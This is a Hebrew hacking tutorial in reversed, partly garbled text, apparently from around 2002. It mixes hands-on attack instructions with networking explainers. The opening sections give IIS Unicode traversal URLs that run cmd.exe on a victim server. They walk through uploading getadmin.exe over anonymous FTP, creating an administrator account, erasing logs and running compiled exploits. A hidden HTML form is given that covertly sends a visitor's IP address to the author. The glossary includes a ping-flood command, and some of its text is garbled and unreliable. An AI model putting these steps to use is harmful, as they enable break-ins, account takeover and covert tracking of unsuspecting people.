רופב וילא םינלמ ןושאר רבד םתא רתאל !ורפיל םיצור ונחנאש דיגנ אוב בו 80 םתא זאו
:אבה לפה !פוקו רניא םיצחולו והשמ םימשור
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/4.0
Date: sat, 28 sep 2002 18:17:09 GMT
Content-Length: 407
תסריג !ירמ אוהש ונל עידומ תרשה בו ולכתסית םא IIS 4.0 .
תסריג םוקמיב םכל תויהל לוכיש בל ומיש .הצירפל ונל םיאתמ רתאהש רמואש המ 4.0 תסריג
5.0 .
.תכרעמ התוא הז הרקימ לכב
'ה תכרעמ תא !ירמ רתאהש וניליגש ירחא IIS !המצע הצירפל רובענ (
% %
%
דוקינויה גאב
%)%)%)%)%)%)
!ירהל ונל רשפאמ דוקינויה גאב .תאזה תכרעמב םסרופמ יכה גאבה הז דוקינויה גאב (בו
.ובש תויקיתה לעו רתאה לע קוחרמ סוד תודוקפ
:הז תא םישוע ךיא םכל ריבסי ינא וישכע
http://www.TheServer.com/scripts/..ºc1º9c../winnt/system32/cmd.exe?/c+dir+c
,:
:רבסה
www.TheServer.com
.וילא !ורפיל םיצור םתאש רתאה אובל לכוי הז םוקמב
scipts 'ה תא תנסכאמש היקיתה וז ' cgi .ובש םיפירקסהו רתאה לש
; c1º9c לכב הזב םיניבמ אל םתא םא םכל בושח ךכ לכ אל רבד הז דוקינויה םוגרת הז '
.תופש ןומה דוקינויל שי הרקימ
3*:
רחא והשמ םכל ןיא םא הז תא וריאשת ולש םירשפאה םימוגריתה דחא הז
/ winnt/system32/cmd.exe +
!בוקל ךתוא הנפמש קלחה הז cmd.exe גוסמ םיצבק ליעפמש !בוקה הז
bat 'ו cmd .
םיצירמש סוד תודוקפ לש #סוא םכותב םירמוש םה ןבומכש
/ c+dir+c ,:
.הצירפה לש יתימאה עקה הז
.יסה ןנוכ ןכות תא תוארהל ונל רמוא הז הפש עדוי סודב ןיבמש ימל
:איה שדח !בוק רוציל תנמ לע םימשור ונחנא התואש הדוקפה םיצבק תריציל רובענ וישכע (בו
echo
:!בוקה ךותל סק סינכהל םיצור ונחנאש דיגנ אוב
index.asp
הככ השענ ונחנא
http://www.Theservername.com/scripts/..ºc1º9c../winnt/system32/cmd.exe?/c+
echo+kaki+>>+c:\inetpub\scripts\index.asp
ושפ !ושפ שממ הז הז תא םירתופ ךיא (וישכע (הז תא רשפאי אל רתאה היעב שי לבא
!בוקה תא םיקיתעמ
cmd.exe

c:\inetpub\scripts
הככ הז תא תושעל ןתינ היהי זאו
http://victim.machine/scripts/cmd.exe?/c+echo+kaki+>>+c:\inetpub\script\index.
asp
ךרד תודוקפ לע םג םושרי ינא אבה סקב ילוא תופסונ תודוקפ ינימ לכ דוע שי וישכע
ftp
דועו
% %
%
admin rights
%)%)%)%)%)%)
ךירצ קר הברה דובעל ילב רתאל ןימדא תושיג גישהל ךיא םכל ריבסהל ךלוה ינא הפ בו
האשרה
היקיתל םיצבק תולעל
cgi-bin
רופב םימינונאכ סנכיהל וסנ 21 הככ ומשיר סודה ךרד
ftp www.kaki.com
הזכ והשמ חב םכל היהי וישכע
Connected to www.kaki.com
220 kaki Microsoft FTP Service (Version 3.0 .)
User (www.kaky.com:(none :))
אוה הז הרקימב תרשה םשל בל ומיש וישכע
kaki
'ה תכרעמב זא
IIS
put
ארקי רוצינש סימינונאה ןובשח
IUSR_kaki
'ב וישכע
3*=
user
ומשרית
anonymous
ומכ והשמ ומשר םתס לימיא ומשרית לא וליפא אמסיס רותב לימיא םושריל םכל דיגי אוה זאו
1234
םושרי אוה זאו
Connect
הדוקפה י$ע בוק םילעמ רתאל !בוק תולעהל וסנ (הצירפה לש קלחה עיגמשכו
put
'ה לש הקיתל תולעהל וסנתו והשמ וא ןכסמ דומע הזיא וניכת
cgi-bin
הצירפה לש אבה קלחל רובענ זא הפיו בו ךלה לכה םא
םיצבק השולש גישהל םיכירצ םתא
getadmin.exe gasys.dll cmd.exe
סודניוו ישמתשמל
NT
'ב םישמתשמ אלש ןכמ הלאל ולאה םיצבקה תא םכל שי םא וקדיב
Nt
לגוג ומכ שופיח יעונמל וכל
www.google.com
סודניוו ישמתשממ ושקב אל םא ואצמיתש םיוכיסה בור וישכע
NT
ומשירו סודה ןולחל ורזיחוישכע
binary
תא ולעת בל ומיש םיצבקה תא הלענ וישכעו יראניב !בוק תלבקל תרושקת חותפל רמוא הזש
היקיתל םיצבקה
cgi-bin
הככ ומשיר
put getadmin.exe
put cmd.exe
put gasys.dll
קוידיב הככ ומשירו םכלש ןפדפדל וכל סודה ןולח תא ורגיס וישכע
http://www.kaki.com/cgi-bin/getadmin.exe?IUSR_kaki
הנעי ןדפדהש הז הרקיש המ וישכע
cgi error
שדחה שמתשמלש רמוא הז בותכ מה וקדבית םא הרקימ לכב םושריל חוכ יל היה אל הלב הלבו
אוה אלה ונרציש
iusr_kaki
רמולכ לע תואשרה שי
Admin
הככ והשלכ םשב שדח ןובשח ורצ וישכע
http://www.kaki.com/cgi-
bin/cmd.exe?/cº20c:\winnt\system32\net.exeº20userº20VeNuSº20FuckIISº
20/add
םירכוז אל םתאש הרקימל םדוקמ ונישעש ומכ לע תויוכז הזה ןובשחל ונתו
http://www.kaki.com/cgi-bin/getadmin.exe?VeNuS
ומשיר שמתשמ םש םכממ שקבי הזשכ זאו רתאל תורשקתיהה תא וחתיפ סודל וכל וישכע
VeNuS
אמסיסו
FuckIIS
הלב הלב הלב הלבו םכל אבש המ תראל ושעת ונהת
יסקורפב שמתשהל וחכשת לא ןבומכ םתוא תונשל וא םיגול וקחמיל וחכשת לא #וסב הא
והזו
3*J
% %
%
םייולפסקא
%)%)%)%)%)
ללכב וא ןימדא תויוכז ךל תתל תנמ לע החבא רוח תלצנמש הנק תינכות אוה יולפסקא בו
רתאב עוגפיל
תפשב םיבתכינ כ$דב םיולפסקא יהשלכ ךרדב
לרפ וא יס
בו ללאש ןובשח וא סקינוי וא סקוניל תכרעמ לע םיצרומ םהו
הנכותה לע םג !ורל לכוי אוה לרפב יולפסקא הז םא וישכע
לרפביקא
www.activeestat.com
םכל ורזעיש םימניח ללאש תונובשח המכ םכל יתגשה ינא זא בו
www.cyberspace.org
www.abronet.org
הככ וא נל ךרד נלה רופ ךרד םירבחתימ ללאש תונובשחל ןבומכ
הלעפה .' לחתה
telnet www.abronet.org 21
יולפסקאה תא וצירתו שדח ןובשח ורצית והזו
% %
%
םייולפסקא תצרה
)%)%)%)%)%)%)%)
יס וא לרפ תפשב בותכ היהי כ$דב יולפסקא םדוקמ יתמשרש ומכ בו
יולפסקא לפמקל ידכב םכלש ללאשה ןובשחב הצרהה עקל ובענ אוב זא
הככ ושעת זא יסב
gcc exploit.c -o exploit.exe
הככ ללאשה ןובשחב ומשרית הז ירחא
/. exploit.exe
!ירהל ךיא תוארוה םכל ןתי הזו
סודה ךרד הככ ושעת לרפב יולפסקא הז םא
perl exploit.pl
:ב רזעיהל םג לוכי הוצרש ימ סקוניל ךרד םג הככ תושעל רשפא
לרפביקא
www.activestat.com
HaSaTaN
3*N
Ip נרניא תובותכו
++ נרניא תבותכ היונב דציכ .א
.נרניאה תא הווהמה תשרה ךותב םייוסמ בשחמ יוהיזל תשמשמ נרניאב תבותכ
אמגוד .תודוקנ תועצמאב ןהיניב תודרפומה (תורפס לש תוצובק תרושמ תבכרומ תבותכה
תיסופי תבותכל
:איה
$ 44.56.0.48 $
$ )ןימיל לאמשמ דימת םיארוק תבותכה תא( (תמייוסמ תועמשמ שי רפסמ לכל רשאכ 44 $
$ (תשרה תא למסמ 55 $ 'ו $ 0 $ 'ןורחאו (תשר'יתת םילמסמ $ 48 לעב לש בשחמה תא למסמ $
.תשרל רשוקמה רתאה
תבותכ$ ארקנ תורפס לש הז #צר IP רפסמ$ וא $ IP תיש החתופ שמתשמה תוחונה ךרוצל .$
רפסמ לש הרמה ip ('ה השעמל איהש (םילימ וא תויתואמ תבכרומה (תירמונ אפלא תבותכל
Domain Name (םינותנ רגאמ תלצנמ החתופש תכרעמה .ותוא םיריכמ ונאש יפכ DNS -
Domain Name Server תבותכה .תויתואב תובותכל תוירפסמה תובותכה ןיב רשקל תנמ לע (
רדס .תודוקנ תועצמאב תודרפומה םיליממ תבכרומ (תוירפסמה תובותכל המודב (תויתואב
.לאמשל ןימימ ןכ םג אוה וזכ תבותכ תאירק
% %

%
.ב TLD and SLD :
:םיקלח ינשמ תובכרומ )תויתואב ןהש יפכ( תוינורקלאה תובותכה
1 . Top Level Domain .
3*.
:הבתכה סקדניא
+נרניא תבותכ היונב דציכ .א
.ב TLD and SLD
נרניאב תובותכ שופיח .ג
נרניאב תובותכ םושיר .ד
:אמגודל( תבותכה גוס פ$ע תושיה גוס תא םיהזמ (ב$הראב gov (תיתלשממ תושיל . edu
. (תיכוניח תושיל com לעב בשוי הב הנידמה תא ההזמ ב$הראל !וחמו ()ירחסמ קסעל
( תבותכה il (לארשיל fr .)המודכו תפרצל
2 . Second Level Domain .
תיסרבינוא (אמגודל (יפיצפסה תבותכה לעב קיזחמ וב קלחה והז Georgetown הלוכי
:תבותכה תא םושרל
georgetown.edu רשאכ georgetown תוהדזהל היסרבינואה הרחב הב קלחה אוה
'ה( ותועצמאב SLD .)םהלש
'ה (השעמל SLD אוהש ןוויכ (נרניאב רחסמ ינמיס אשונב םיכוסכסל ירקיעה םרוגה אוה
נרניאה ישמתשמ ידי לע רתאה שופיחו ירחסמה הנמיס וא הרבחה םש תא ליכמה קלחה
'ה תדלקה ידי לע ללכ ךרדב השענ SLD .
'ה םג (ךשמהב הארנש יפכ (תאז םע TLD .הז רשקהב יתייעב םרוג אוה
םע םירשקתמה (םיירפ םישמתשמל תוקנעומה תובותכ יכ (ןייצל שי
רדגב ןניא ()המודכו יפ.י.פא (םיליימיא( תוריש יקפס Domain Names םיירפ תומש אלא
'ה (הזכ הרקמב .ומצע קפסה ידי לע תונתינ רשאו םתוא תושמשמה )תונובשח( תובית לש
Domain Name .)= ןמיסה ירחא עיפומ םשה( ומצע קפסה לש ומש אוה
3 .ויתוכלשהו נרניאב תבותכ שופיח לש ינכה ןפה .
רפסמ לכל IP רתאל עיגהל הסנמה (נרניאב שמתשמה לע ןכלו תחא תידוחיי תבותכ שי
.רתא ותואל עיגהל תנמ לע תבותכה לש קייודמה תויתואהו םילימה #צר תא דילקהל (םייוסמ
רפסמל שמתשמה ידי לע תודלקומה םילימה #צר תא תמגרתמ תכרעמה IP לכב תשפחמו
רתאל שמתשמה רבעומ (דלקומה רפסמל ההז רפסמ אצמנש עגרב .ההז רפסמ תשרה יבחר
עיגהל חילצי אל שמתשמהש ידכב תבותכבש וזמ הנוש תחא תוא תדלקהב יד .וז תבותכבש
רתא םייק אלש העדוה לבקיש וא רחא רתאל עיגי שמתשמהש וא (הזכ הרקמב (שקובמה רתאל
.הזכ

%
:נרניאב תובותכ שופיח .ג
:ןהמ שמח ןחבנ ןלהל (תוכלשה רפסמ שי נרניאב תובותכ שופיח לש ינכה ןפל
'כ ותוא םושרלו הלש רחסמה ןמיסב שמתשהל הצורש הרבח )א Domain Name דימת אל (
הרבח לכל אל .םילימ וא תויתואל רחסמ ןמיס םגרתל ןתינ דימת אל ןכש תאז תושעל הלוכי
תויתואמ תובכרומ תובותכהש ןויכו (ירחסמה הנמיס וא המש ןיבל הרבחה םש ןיב תוהז שי
ירחסמ םשל וא ןמיסל יויב תתל תובותכה ךרד ןתינ אל (ההז הרוצו לדוג תולעב תויניל
אל יזא ןתינ םא םגו (תויתואב יויב רחסמ ןמיסל תתל ןתינ דימת אל ןכ ומכ .תרחא ךרדב
תויתואב קר אלא (םינוש םיעבצב וא רחא גוסמ נופב וא הנוש לדוגב תויתואב שמתשהל ןתינ
תא לידבהל םינמיסה ילעב לש תלוכיה תא הניקמ וז הלבגמ .ההז דיחא עבצו גוס (לדוגב
(רומאכ( ןמיסה תוידוחייל איבהל םיכרד תוחפ שיש ןוויכ תאז (םירחאמ םהלש ןמיסה
םיירקיעה םיאנתה דחא אוה (ולש $ןיחבמה יפואה$ תורחא םילימב וא (ןמיסה לש תוידוחייה
.)רחסמ ןמיסכ ןמיסב הרכהו םושירל
לעב וניא אוה םא םג ' נרניאב תבותככ רחא ידיב ומשרנ ירחסמה םשה וא ןמיסה םא )ב
םישמתשמה (םשה וא ןמיסה לש םייתימאה םילעבהש ירה ' ירחסמה םשה וא ןמיסה
( ותואב TLD 'כ ןמיס וא םש ותוא םושרל רבכ םילוכי םניא Domain Name רומאכ (ןכש
רפסמ לכל תחא תידוחיי תבותכ קר תמייק (ליעל IP .
םושרל ןתינ אל םויכ )ג Domain Name 'מ רתוי ליכמה 24 .תויתוא
3*;
תובכרומה תובותכב שמתשהל תולולע רתוי םיכורא םיירחסמ תומש ןהל שיש תורבח (ןכל
.םירחא םינוגרא ןיבל ןניב לבלבל םילולעה (תובית ישאר וא םירוציקמ
דוע לכ (רחא םושר ןמיסל המוד וא ההזה ןמיס םושרל ןתינ (רחסמ ינמיסב רבודמ רשאכ )ד
רוביצ ברקב םהיניב לובלבל תוריבס ןיאו םיתורש וא םירצומ לש םידרפנ םיגוסב רבודמ
.םינכרצה
רבכש תבותכל ההז תבותכ םושרל ןתינ אל (נרניאב תובותכב רבודמ רשאכ (תאז תמועל
שי תורבח יתשל רשאכ (ןכל .ירמגל םינוש םיתוריש וא םירצומב רבודמ רשאכ םג (תמייק
נרניאב התבותככ ירחסמה הנמיס תא הנושאר םושרתש הרבחה קר (ירחסמ ןמיס ותוא
תיבייאוניא אוהש (יפולח םשב קפתסהל !לאית היינשה הרבחה וליאו (וז תבותכב הכזת
ירחסמה הנמיסב שמתשהל לכות אל היינשה הרבחהש ןאכמ .היוהיזלו הרבחל בו תוחפ
'ב$לשת ()שדח חסונ( רחסמ ינמיס תדוקפ יפ לעש תורמל (נרניאב התבותככ 1972 רתומ (
.תרחא היצאויס לכב וב תשמתשמ #א איהו וב שמתשהל הל
הנידמב הרבחלשכ (תויפרגואיג תוביסמ םג רצוויהל תולוכי תומוד תויעב )ה x רחסמ ןמיס שי
הנידמב תרחא הרבח לש הזל ההז y ותוא תללוכה נרניאב תבותכ םושרל תוצור ןהיתשו (
'ו רחסמ ןמיס TLD :ןוגכ( ההז
$ com $ וא $. org לולעש רבד (תשקובמה תבותכה תא םושרל לכות הלא תורבחמ תחא קר ()$.
.םיימואלניב םיכוסכסל ליבוהל
!ומיא אוה וז היעבל ירשפא ןורתיפ TLD ןכא תובר תונידמש יפכ (הנידמו הנידמ לכל הנוש
$.$ תמויסה י$ע ההוזמ לשמל לארשי( ושע il תונידמב םיהז רחסמ ינמיס םושרל ןתינ ךכ .)
ררועמ הז ןורתפ ךא .תונושה
הלולע רשא (נרניא תובותככ םיהז רחסמ ינמיס לש תובר תויוליפכ תריצי איהו תרחא היעב
.רחסמה ןמיס תוידוחיי לולידל םורגל


:נרניאב תובותכ םושיר .ד
נרניאב שומישה רבגש לככ ךא (תחא תיזכרמ תוכמס ידי לע הלהונ אל םעפ #א נרניאה
שחרתמה לע עדימ ןתיש והשלכ #וג םיקהל ךרוצה ררועתה ירפה קושב חיכש רתויו רתוי ךפהו
'ב .נרניאב 1993
' עדמל תיאקירמאה ןרקה NSF - National Science Foundation עדימל זכרמ המיקה '
(םשב
( Internet Network Information Center (interNIC שחרתמה לכ לע עדימ קפסמה '
.נרניאב
:תורבח שולש ידי לע לעפותמ הז עדימ זכרמ AT&T (לוהינ יתוריש תקפסמה ' General
Atomics 'ו עדימ תוכרעמ לש םיתוריש תקפסמה Network Solutions Inc לע תיארחאה (
.ב$הראב נרניאה תובותכ םושיר
(םיימוקמ םינוגריא לש בר רפסמ ידי לע תומשרנ ב$הראל !וחמ תורבח לש נרניא תובותכ
םהמ דחא לכ רשא
#םשב םיעודי הלא םינוגריא .ולש רוזאב תובותכה םושירל יארחא NSI - Network
Information Centers .
'ה תוינידמ התיה התדובע תליחתמ NSI לע נרניאב תובותכ םושיר תוכלשהב ברעתהל אלש
.רחסמ ינמיס תורפה לע תוירחא תחקל אלו (תורבח לש רחסמ ינמיס NSI דרשמכ המצע האור
.אל ותו רחא #וג תבול ההז םושיר םייק םאה קודבל קר אוה ודיקפת לכש (דבלב םושיר
תא םיחנמה תונורקע ינש םנשי (ךכל םאתהב NSI ידרשמ תא ןכו נרניא תובותכ םושיר יבגל
:תורחא תונידמב ומקוהש םירחאה םושירה
1 :תוכזב ןושאר ' ןמזב ןושאר )
תמייוסמ תבותכ (ןכל .תונוש תורבח יתש םש לע תבותכ התוא םושרל ןתינ אל הז ןורקע יפל
.השקבל המידקמה הרבח התוא םש לע קר םשרית
3+*
2 :דחא ןוגריאל דחא םש )
לוכי םנמא .תורבח לוכשאב רבודמ םא םג (דבלב תחא תבותכ היהת ןוגריא לכל הז ןורקע יפל
תבותכ לעב
( תובותכ'תת לש #וסניא רוציל נרניאב subdomain לוכשאב רבודמ םא םג (דחא ןוגריא ךא ()
'לש #וריצב שמתשהל לוכי (תורבח לש SLD 'ו TLD .דבלב דחא
HaSaTaN
יוליג IP רתאב שלוגש ימ לש
ok !בוקל רושק הז !בוק ( hack.htm !ולש רוקמ דוקה תא הפ איבי ינא זא (בל םתמש רבכ םא
2 HTML .
2 HEAD .
2 META content÷"text/html; charset÷windows-1255" http-equiv÷Content-Type .
2 FORM action÷http://wwp.icq.com/scripts/WWPMsg.dll method÷post
name÷pagerform .
2 INPUT name÷to type÷hidden value÷123901635 .
2 INPUT name÷from type÷hidden value÷Reveal .
2 INPUT name÷fromemail type÷hidden value÷dk9¡walla.co.il .
2 INPUT name÷subject type÷hidden value÷"Hi This is My Ip .$!
2 SCRIPT language÷javascript .
''!2
document.write('<input type÷"hidden" name÷"body" value÷"\nThis is My IP
Enjoy and DONT hack 2 much )".$!!!!
document.pagerform.submit )(
.''//
/2 SCRIPT .
/2 FORM .
2 META content÷"MSHTML 5.00.2919.6307" name÷GENERATOR .
/2 HEAD .
2 BODY></BODY .
/2 HTML .
#דה תא ולעתו (רתא וחתפת םתס וא ' םכלש רתאב אוהשלכ #דל ותוא ולעת (הזה פירקסה
.הזה
:הרושל וכל (וישכע 5 :המש בותכ םיאור םתא (
2 INPUT name÷to type÷hidden value÷123901635 .
3++
:רפסמה םוקמב 123901635 .םכלש ויק יס יאה רפסמ תא וסינכת
.ןושארה בלש םא ונרמג (והז
.םייק #ד ךותל ותוא רידחהל וליפא םתא (םכלש רתאל הזה #דה תא ולעת ' וישכע
והשמ קודבל ידכ (הזה #דל סנכיהל ונממ ושקבתו ("צ הזיאב םת וא ויק יסיאב והשימ םא ורבד
!עדוי אל '
ליימיאל חלשי ולש יפ יאה ' םשל סנכי אוהש עגרבו ' םשל סנכי אוהש הביס ואיצמת רכ םתא
!!!!!םכלש
HaSaTaN וא death.up.co.il
ISO-OSI
אשונה (וב םיניבמ הברה אלש אשונ לע ' דואמ הבושח הבתכ איה תאזה הבתכה (םירבח םולש
:אשונה (ותוא ןיבהל היעב םוש םכל היהת אל יתיא לבא ךבוסמ הפי
לדומ$ OSI לש ISO .$
:הבתכה סקדניא
תומדקה
1 לדומ . OSI לש ISO
2 תובכשה תגוע .
)קימעמ( תובכשה עבש
1 תיזיפה הבכשה .
2 ( םינותנה רושיק תכש . DATA-LINK )
3 תשרה תבכש .
4 ( הרבעהה תבכש . TRANSPORT )
5 ( בשומה תבכש . SESSION )
6 ( הגוצתה תבכש . PRESENTATION )
7 ( םושייה תבכש . APPLICATION )
לדומ 4444 osi לש iso 444
'ה תונשב 70 םשב הרבח המק osi יניבמל( עדימ תותשרל םינקת תאביימ התייה הרבחה (
:ונינבש x.803 .)
ארקנ הלש שדחה ןקתה iso .)$תוחותפ תוכרעמ לש תבלושמ הלועפ$(
לדומ OSI ללוכה 7 םע רבדמ בשחמ רשאכ הרוקש המ תא ראתמ ()תויזיפ םקלח( תובכש
.#וסמ םע בשחמ הז םא ןיבו בשחמ לא בשחמ הז םא ןיב (תרש םא בשחמ הז םא ןיב (בשחמ
.םהיניב רשקתל םילוכי םינוש דויצ יכרעמ םהבש (תוכרעמ תריצי לע לקהל דעונ הז לדומ
3+9
ןקת תא וצמיא תורבחה בור ISO/OSI .קושב תומייקה תורחאה עדימה תותשר תא אלו
ןקת הליחתכל OSI/ISO ןיבל הניב תרבוחמש ' תימוקמ עדימ תשר( דבלב םי$מתרל דעוימ היה
'ה תונש עצמאב לבא ()#וסמ וא בשחמ םא המצע 70 'ה ןקת (נרניאה תוחתפתה תליחת (
ISO/OSI נרניאה לוקוורפב םג שמושו !פוה TCP/IP בשחמ לכב אצמנ אוה םויהו (
.בשחמו
444 תובכשה תגוע 444

לדומ תא םכמצעל וניימדת OSI ( יתנכהש םישרתל המודב (תובכש תגוע לעכ CAKE.1PG .)
םילבכ - תיזיפ( תיזיפה הבכשה איה (תובכשה לכ תא הילע תאשונ ' הנותחתה הבכשה
.)הרמוחו
,/,/,/,/,/,/,/,/,/,/,/,תובכשה עבש/,/,/,/,/,/,/,/,/,/,/,.
:תיזיפה הבכשה ' הנושארה הבכשה
תואבה תוכשה .תותואה תרבעה יעצמא תאו םיילמשחה םירוביחה תא תקפסמ תיזיפה הבכשה
תיזיפה הבכשל םלוכ םיכייש "וכו םייפוא םייס (םילבכ .תיזיפה הבכשה תועצמאב תורבדמ
.הרמוחה םצעב איהש
,,, םימדקתמל /// :
אוה רתויב יוצמה ןקתהש יאדוול בורק RS-232C ודיקפת תא רידגמה ("םינותנ תרבעה ןקת" (
$ תוגציימ ' וחב חתמ תומר וליאו (רבחמב ןיפ לכ לש 0 $ וא $ 1 .םייגול $
םשב שדח ןקת (רבד לש ופוסב RS-449 ןקת תא #ילחהל רומא RS-232C םיאפוריאה .
ארקנש ימואל'ןינ ןקתב םישמתשמ V.24 'ל דואמ המודה ( RS-232C לש םינקת םה הלא לכ .
.תיזיפה הכשה
/// .םימדקתמה לש עקה ןאכל דע ,,,
אל תאזה הבכשה תא קתנת םא .הילעמש תוכשה לכ רובע תותואה תא הריבעמ תיזיפה הבכשה
התאש לככ .רמול המ ךל היהי אל (רתוי תוהובגה תובכשה אלל םלוא .ללכ תרושקת רוציל לכות
לדומב רתוי ההובג הלוע OSI לש ותניחבמ רתוי הלודג תועמשמ תלעב תויהל תכופה תרושקתה (
.ינשה הצקב )#וסמה וא תרשה וא( שמתשמה
( םינותנה רושיק תבכש ' היינשה הבכשה DATA-LINK :)
ןיב םינותנה תמירזב ולשל בייח התא (םיילמשחהו םייזיפה םיירוביחה תא ונל שיש רחאל
לש םינותנה רושיק תבכש .ינשה דצבש תכרעמל ךלש תכרעמה OSI חקפמ ומכ תדקפתמ
($םירסמ$'ל ' דחי םיוות תדגאמ וז המר .תבכר ביכרהל ידכ תונורק רבחמה (תבכר לש #וסמב
.$תוליסמ$ל םתוא הריבעמ איהש ינפל םתוא תקדוב כ$חאו
.$םינותנה תבכש$ לש הידיקפתמ איה םיפוסמה ינש ןיב $תובכר$ה בותינ
,,, םימדקתמל /// :
ההובג המרב םינותנ רושיק תרקב תוברל (םילוקוורפ הברהב תשמתשמ םינותנה רושיק תבכש
( HDLC ( םימדקתמ תרושקת תרקב ילהנו (תינורכניס'וד תרושקת () ADCCP ךירצ ךניא .)
םיביצמה (םיחקפמכ םהילע ושח ושפ .הלאה םילוקוורפה לש םירפהמ דחא #א ריכהל
תרושקת תוכרעמב .םולשב םדעיל ועיגה םהש םיאוומו (תונוכנה תוליסמה לע םינותנ $תובכר$
תוססובמ PC םיבלושמ םילדעמ י$ע (כ$דב תועצבתמ םינותנה רושיק תכש לש תויצקנופה (
.קשממה יסירכ לע ' םידחוימ
/// .םימדקתמה לש עקה ןאכל דע ,,,
:תשרה תבכש ' תישילשה הבכשה
3+3
( םיתורשה תומידק (תשרה בצמ סיסב לע (םינותנה לש יזיפה בותינה ןפוא תא תראתמ
TALKEN-RING .םירחא םימרוגו ()וניניבש םיניבמל
( הרבעהה ' תיעיברה הבכשה TRANSPORT :)
'ה הבכשה (הרבעהה תבכש 4 לדומב OSI תבכש לש הלאל דואמ תומוד תולועפ רפסמ תעצמ (
ילהנמ$ .תשרה תכשב ומכ םיתנה ינפ'לע אלו ימוקמ ןפואב םתוא תעצמ איה םלוא (תשרה
( $םינקתה DRIVERS .הרבעהה תבכש לש תומישמה תא םיעצבמה הלא םה תשרה תנכותב )
הלקת לש הרקמב הלועפל סנכנה (תבכרה תליסמ #וסמ לש הדובעה חקפמל המוד וז הבכש
תא תרמוש ילוא וא םייפולח םיביתנ תשפחמ הרבעהה תבכש תנכות (תלפונ תשרה םא .תכרעמב
(תאדוומ איהש ךכ י$ תוכיא תחבאב תלפמ איה .תשרב תרושקתה שודיחל דע רדושש עדימה
.ןוכנה רדסבו (ןוכנה מרופב םה (ועיגהש םיונתנהש
הרבעהה תבכש .םיאצמנ םלוכש אדוול ידכ (אשמ תונורק רופסל הלוכי םינותנה רושיק תבכש
.רסח וא רבשנ אל רדש אדוול ידכ (םתוא תחתופ
( בשומה תבכש ' תישימחה הבכשה SESSION :)
רתויב הלודגה תובישחה תלעב הבכשה תובורק םיתיעל איה (בשומה תכש (תישימחה הבכשה
תוכרעמב PC )םושיי ותוא לש םיקלח ינש וא( םימושיי ינשל תורשפאמש תולועפ תעצבמ איה (
( תכרעמל הסינכ ילהנ (תומש יוהיז (תוינוחיב תוקידב :תשרה לע םהניב רשקתל NOVELL
.תורחא תומוד תויצקנופו )בול הרוכזה
( הגוצתה תבכש ' תישישה הבכשה PRESENTATION :)
(םינותנ תנזהל םידחוימ םימרופ (הגוצת יעבצ (םיבהבהמ םיוות גצה לע האור התאש עגרב
הנפצהב םג לפל הלוכי וז הבכש .הגוצתה תבכשב אצמנ התא (גצה לע םיפסונ םירבדו הקיפרג
.תודחוימ םיצבק ומריפ תוישבו
.וגיצהל רחב תנכמתהש יפכ הארי יפוסה רצומהש ידכ (םיצבקו םיכסמ תמרפמ איה
.םיוותה ידוקו הקיפרגל דחוימב (הרקבה יוות תא הליכמ הגוצתה תבכש
( םושייה תבכש ' תיעיבשה (הנורחאה הבכשה APPLICATION :)
תואצמנ הז םוקמב .שמתשמה תא תתרשמ ' םושייה תכש ' תובכשה תדועב הנוילעה הבכשה
( תשרה לש הלעפהה תכרעמ OS הלכו (ל$אוד (םיצבק תקולחמ לחה רבד לכ ' םושייה תנכותו )
.תורישי הב לוש שמתמה .תונובשח תלהנהו םינותנ'יסיסב לוהינ
םוכיס
לדומב הנורחאה הבכשה התייה וז OSI/ISO תודעוו תורשע םלוא (ידמל םיושפ תונויערה .
.םירידא םייילופ םיקבאמו (הבכש לכ לש םינקה םיקלחל םינקת תרדגה לע תוחרו
HaSaTaN
3+:
םיגשומ ןולימ 2 :
תאירק (םעפ ידמ ןנשלו סיפדהל דואמ יאדכ (קסעל וסנכנ וישכע קרש הלאל בתכנ ןולימה
!םיאבה םירבדל עקרו סיסב םכל ונתי (הלא םירבד
.םכסמו יללכ רתוי ושפ הז ךירדמ (ןויליגה תאירק םוקמב ךירדמה לע ךמתסהל ןיא
-$$, :
Hy,e" 6ex$ 6"4.s8e" 3"o$o9o& לש ת$ר
הייפצ רשפאמ אוה (םייקסעו םייתיב םיבשחמב רתויב עודיהו (שמושמה לוקוורפה אוה
:לע םיאצמנש םיפדב
!!
o"&/ !%/e !e> לש ת$ר
.לע יבשחממו םיתרשמ היונב תשרה (םלועה ל ג$ע השורפש המוצע םיבשחמ תשר
3-49#$
.תרשב אצמנו סנכנ םכלש בשחמהש :אוה עדימב בושחה קלחה (תרשל עדימ חלוש קאפה
:גניפ תדוקפ6
3%.0 Q$?! x.x.x.x so+e .*+>e"
.ותוא הפיצמ הזבו תרשה לא םי,קאפ תחלוש
:גניפה תדוקפ רבסה
תורשפאה תחיתפל סודב שמשמ' 3%.0
' ' )םיקאפ חלושש דחא (ונלש הרקימב( גניפה גוסל שמשמ $?!
' #יצהל םיצור ותוא תרשה לש דבלב יפ יאה תרדגהל שמשמ x.x.x.x
' !חולשל םיצור םתא ותוא םיקאפה רפסמ תרדגהל שמשמ So+e .*+>e"
!למומ( 2600 )ותא תרושקתהמ םכתא איצוי תרשה כ$דב (הזמ רתוי (
&רתויב הנוילעה המרב םתאש רחאל סוד ןולחב בותכל שי גניפה תדוקפ תא
:סוד ןולח
Dos +o/e :
:תילנאבו סודל הינפה2תוינכות2לחתה2ב חתפנ
. s$4"$@,"o0"4+s@/os
:בותכ אובו חתפנ אוה כ$דב (סוד ןולח םיחתופשכ ' סודב $תומר$
C2P!%./o!s
(סואודניוו תייקיתל ונסנכנו ישאר ןנוכ כ$חא (ילש בשחמה תא סואודניווב ונחתפ וליאכ הזש
:בותכ היהיש םוקימבש (הנווכה (סודב המא םידרוי ונאש םירמוא ונאשכ
C2P!%./o!s
3+=
:בותכ היהי
C /:
+הז תא םישוע ךיא (סואודניוו תייקית ינפל (הרוחא המר ונכלה רמולכ
:םיצחול ושפ (דואמ ושפ
9/ ..
!)רתויב הנוילעה המרב קר (בותכל רשפא גניפה תדוקפ תא(
:סודב תוישומיש תודוקפ
De&
:בותכנו סודל ךלנ לשמל (אוהש לכ !בוקל תי?ל@ד תושעל ומכ שממ
De& 92Pso+e8%&e.exe
קחמי אוהו
Co,y
:ךכ םיבתוכ (ליגרו ושפ
Co,y $-eM8%&eMyo*M!4.$M$oM9o,y 4 :
ךתורשפאב (םינוילקת ןנוכל (קיתעהל הצור התא ותוא !בוקה תא קיתעי (הז השעי הזש המ
:אמגודל ךלש בשחמב תרחא הייקיתל קיתעהל
Co,y $-eM8%&e !%./o!sN9oo9#%es
:בותכל ךרוצ ןיא (הנוילעה המרה לש בצמב םיאצמנ םתא םא
C2P!%./o!s
:קיפסמ אלא
